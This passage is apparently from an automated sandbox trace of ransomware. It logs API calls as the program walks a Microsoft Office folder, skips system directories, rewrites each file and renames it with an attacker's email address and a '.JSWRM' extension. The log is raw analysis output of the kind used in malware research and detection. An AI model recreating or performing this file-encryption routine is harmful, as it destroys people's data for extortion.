lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.927] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5320) returned 1 [0141.927] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.927] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x14c0, lpOverlapped=0x0) returned 1 [0141.929] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.929] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x14c0, lpOverlapped=0x0) returned 1 [0141.929] CloseHandle (hObject=0x238) returned 1 [0141.929] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.930] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b84e38, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b84e38, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b84e38, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22cf4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="GIFT98.POC", cAlternateFileName="")) returned 1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2=".") returned 1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="..") returned 1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="...") returned 1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="windows") returned -1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="recovery") returned -1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="perflogs") returned -1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="documents and settings") returned 1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="system volume information") returned -1 [0141.930] lstrcmpiW (lpString1="GIFT98.POC", lpString2="msocache") returned -1 [0141.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIFT98.POC", lpUsedDefaultChar=0x0) returned 10 [0141.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIFT98.POC", lpUsedDefaultChar=0x0) returned 10 [0141.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.931] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=142580) returned 1 [0141.931] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.931] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22cf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x22cf0, lpOverlapped=0x0) returned 1 [0141.941] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.941] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22cf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x22cf0, lpOverlapped=0x0) returned 1 [0141.942] CloseHandle (hObject=0x238) returned 1 [0141.942] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.943] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b5ebb7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b5ebb7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b84e38, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6314, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="GREET11.POC", cAlternateFileName="")) returned 1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2=".") returned 1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="..") returned 1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="...") returned 1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="windows") returned -1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="recovery") returned -1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="perflogs") returned -1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="documents and settings") returned 1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="system volume information") returned -1 [0141.943] lstrcmpiW (lpString1="GREET11.POC", lpString2="msocache") returned -1 [0141.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREET11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREET11.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GREET11.POC", lpUsedDefaultChar=0x0) returned 11 [0141.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREET11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREET11.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GREET11.POC", lpUsedDefaultChar=0x0) returned 11 [0141.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREET11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greet11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.944] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=877332) returned 1 [0141.944] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.945] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.958] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.958] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.959] CloseHandle (hObject=0x238) returned 1 [0141.959] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREET11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greet11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREET11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greet11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.960] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b5ebb7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b5ebb7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22986bc2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x124b3b7, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="GREETING.DPV", cAlternateFileName="")) returned 1 [0141.960] lstrcmpiW (lpString1="GREETING.DPV", lpString2=".") returned 1 [0141.960] lstrcmpiW (lpString1="GREETING.DPV", lpString2="..") returned 1 [0141.960] lstrcmpiW (lpString1="GREETING.DPV", lpString2="...") returned 1 [0141.960] lstrcmpiW (lpString1="GREETING.DPV", lpString2="windows") returned -1 [0141.960] lstrcmpiW (lpString1="GREETING.DPV", lpString2="recovery") returned -1 [0141.960] lstrcmpiW (lpString1="GREETING.DPV", lpString2="perflogs") returned -1 [0141.961] lstrcmpiW (lpString1="GREETING.DPV", lpString2="documents and settings") returned 1 [0141.961] lstrcmpiW (lpString1="GREETING.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.961] lstrcmpiW (lpString1="GREETING.DPV", lpString2="system volume information") returned -1 [0141.961] lstrcmpiW (lpString1="GREETING.DPV", lpString2="msocache") returned -1 [0141.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GREETING.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GREETING.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREETING.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greeting.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.962] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19182519) returned 1 [0141.962] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.962] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.975] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.975] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.976] CloseHandle (hObject=0x238) returned 1 [0141.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREETING.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greeting.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREETING.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greeting.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.977] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22986bc2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22986bc2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22986bc2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfb0c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="GREETING.XML", cAlternateFileName="")) returned 1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2=".") returned 1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="..") returned 1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="...") returned 1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="windows") returned -1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="recovery") returned -1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="perflogs") returned -1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="documents and settings") returned 1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="system volume information") returned -1 [0141.977] lstrcmpiW (lpString1="GREETING.XML", lpString2="msocache") returned -1 [0141.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GREETING.XML", lpUsedDefaultChar=0x0) returned 12 [0141.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREETING.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GREETING.XML", lpUsedDefaultChar=0x0) returned 12 [0141.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREETING.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greeting.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.978] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=64268) returned 1 [0141.978] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.978] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfb00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xfb00, lpOverlapped=0x0) returned 1 [0141.984] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.984] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfb00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xfb00, lpOverlapped=0x0) returned 1 [0141.985] CloseHandle (hObject=0x238) returned 1 [0141.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREETING.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greeting.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GREETING.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\greeting.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.986] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2293a966, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2293a966, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2296098c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="HEADINGBB.DPV", cAlternateFileName="HEADIN~1.DPV")) returned 1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2=".") returned 1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="..") returned 1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="...") returned 1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="windows") returned -1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="recovery") returned -1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="perflogs") returned -1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="documents and settings") returned 1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="system volume information") returned -1 [0141.986] lstrcmpiW (lpString1="HEADINGBB.DPV", lpString2="msocache") returned -1 [0141.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.DPV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.DPV", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADINGBB.DPV", lpUsedDefaultChar=0x0) returned 13 [0141.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.DPV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.DPV", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADINGBB.DPV", lpUsedDefaultChar=0x0) returned 13 [0141.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\HEADINGBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\headingbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.987] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4096) returned 1 [0141.987] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.987] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x1000, lpOverlapped=0x0) returned 1 [0141.989] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.989] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x1000, lpOverlapped=0x0) returned 1 [0141.989] CloseHandle (hObject=0x238) returned 1 [0141.989] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\HEADINGBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\headingbb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft 